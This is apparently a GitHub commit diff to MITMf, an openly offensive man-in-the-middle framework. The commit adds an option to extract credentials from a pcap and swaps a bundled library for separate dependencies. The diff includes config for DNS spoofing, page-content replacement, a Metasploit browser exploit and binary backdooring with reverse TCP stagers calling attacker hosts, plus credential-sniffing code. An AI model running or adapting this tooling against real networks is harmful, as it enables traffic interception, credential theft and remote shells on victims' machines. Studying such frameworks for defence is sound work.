github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-06 21:12:16 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

added an option to parse creds from a pcap using NetCreds, removed mitmflib as a dep (was causing problems for travis)

Browse source
This commit is contained in:
byt3bl33d3r 2015-08-11 17:11:44 +02:00
parent 0a00f671b8
commit 1a50f000c1
9 changed files with 51 additions and 23 deletions
Download patch file Download diff file Expand all files Collapse all files

10
config/mitmf.conf
View file

@ -37,7 +37,7 @@
nameservers = 8.8.8.8 nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records [[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27 *.butt.org=192.168.178.27
[[[AAAA]]] # Queries for IPv6 address records [[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1 *.thesprawl.org=2001:db8::1
@ -79,7 +79,7 @@
[Replace] [Replace]
[[Regex1]] [[Regex1]]
'Google Search' = 'Google In My Pants' 'Google Search' = 'Google yssas'
[[Regex2]] [[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants" "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@ -240,7 +240,7 @@
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
[[exploits]] [[exploits]]
[[[multi/browser/java_rhino]]] #Exploit's MSF path [[[multi/browser/java_rhino]]] #Exploit's MSF path
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
@ -447,7 +447,7 @@
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump # PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = PATCH_METHOD =
HOST = 10.9.135.193 HOST = 172.16.206.7
PORT = 8444 PORT = 8444
SHELL = iat_reverse_tcp_stager_threaded SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None
@ -459,7 +459,7 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump # PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = PATCH_METHOD =
HOST = 10.9.135.193 HOST = 172.16.206.1
PORT = 8088 PORT = 8088
SHELL = iat_reverse_tcp_stager_threaded SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None

4
core/configwatcher.py
View file

@ -18,8 +18,8 @@
# USA # USA
# #
from mitmflib.watchdog.observers import Observer from watchdog.observers import Observer
from mitmflib.watchdog.events import FileSystemEventHandler from watchdog.events import FileSystemEventHandler
from configobj import ConfigObj from configobj import ConfigObj
class ConfigWatcher(FileSystemEventHandler): class ConfigWatcher(FileSystemEventHandler):

13
core/netcreds.py
View file

@ -48,10 +48,15 @@ class NetCreds:
def sniffer(self, interface, ip): def sniffer(self, interface, ip):
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0) sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
def start(self, interface, ip): def start(self, interface, ip, pcap):
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) if pcap:
t.setDaemon(True) for pkt in PcapReader(pcap):
t.start() pkt_parser(pkt)
sys.exit()
else:
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def pkt_parser(pkt): def pkt_parser(pkt):
''' '''

2
core/responder/settings.py
View file

@ -149,7 +149,7 @@ class Settings(ConfigWatcher):
self.AnalyzeMode = options.analyze self.AnalyzeMode = options.analyze
#self.Upstream_Proxy = options.Upstream_Proxy #self.Upstream_Proxy = options.Upstream_Proxy
self.Verbose = False self.Verbose = True
if options.log_level == 'debug': if options.log_level == 'debug':
self.Verbose = True self.Verbose = True

2
core/servers/DNS.py
View file

@ -42,7 +42,7 @@ from core.configwatcher import ConfigWatcher
from core.utils import shutdown from core.utils import shutdown
from core.logger import logger from core.logger import logger
from mitmflib.dnslib import * from dnslib import *
from IPy import IP from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")

2
core/sslstrip/ServerConnection.py
View file

@ -25,7 +25,7 @@ import gzip
import StringIO import StringIO
import sys import sys
from mitmflib.user_agents import parse from user_agents import parse
from twisted.web.http import HTTPClient from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins

14
mitmf.py
View file

@ -21,7 +21,7 @@
import logging import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
logging.getLogger("mitmflib.watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
import argparse import argparse
import sys import sys
@ -54,6 +54,7 @@ sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="
sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
@ -84,6 +85,10 @@ log = logger().setup_logger("MITMf", formatter)
log.debug("MITMf started: {}".format(sys.argv)) log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds
from core.netcreds import NetCreds
NetCreds().start(options.interface, options.ip, options.read_pcap)
from core.sslstrip.CookieCleaner import CookieCleaner from core.sslstrip.CookieCleaner import CookieCleaner
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins
from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.StrippingProxy import StrippingProxy
@ -135,16 +140,13 @@ if options.filter:
print "|_ PacketFilter online" print "|_ PacketFilter online"
print "| |_ Applying filter {} to incoming packets".format(options.filter) print "| |_ Applying filter {} to incoming packets".format(options.filter)
print "|_ Net-Creds v{} online".format(NetCreds.version)
#Start mitmf-api #Start mitmf-api
from core.mitmfapi import mitmfapi from core.mitmfapi import mitmfapi
print "|_ MITMf-API online" print "|_ MITMf-API online"
mitmfapi().start() mitmfapi().start()
#Start Net-Creds
from core.netcreds import NetCreds
NetCreds().start(options.interface, options.ip)
print "|_ Net-Creds v{} online".format(NetCreds.version)
#Start the HTTP Server #Start the HTTP Server
from core.servers.HTTP import HTTP from core.servers.HTTP import HTTP
HTTP().start() HTTP().start()

4
plugins/beefautorun.py
View file

@ -22,8 +22,8 @@ import os
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.inject import Inject from plugins.inject import Inject
from core.beefapi import BeefAPI from core.beefapi import BeefAPI
from mitmflib.watchdog.observers import Observer from watchdog.observers import Observer
from mitmflib.watchdog.events import FileSystemEventHandler from watchdog.events import FileSystemEventHandler
class BeefAutorun(Inject, Plugin): class BeefAutorun(Inject, Plugin):
name = "BeEFAutoloader" name = "BeEFAutoloader"

23
requirements.txt
View file

@ -1,2 +1,23 @@
git+git://github.com/kti/python-netfilterqueue git+git://github.com/kti/python-netfilterqueue
mitmflib pycrypto>=2.6
pyasn1>=0.1.7
cryptography
Pillow
netaddr
scapy
dnslib
Twisted
pefile
ipy
user_agents
pyopenssl
service_identity
configobj
Flask
dnspython
beautifulsoup4
capstone
msgpack-python
watchdog
requests
pypcap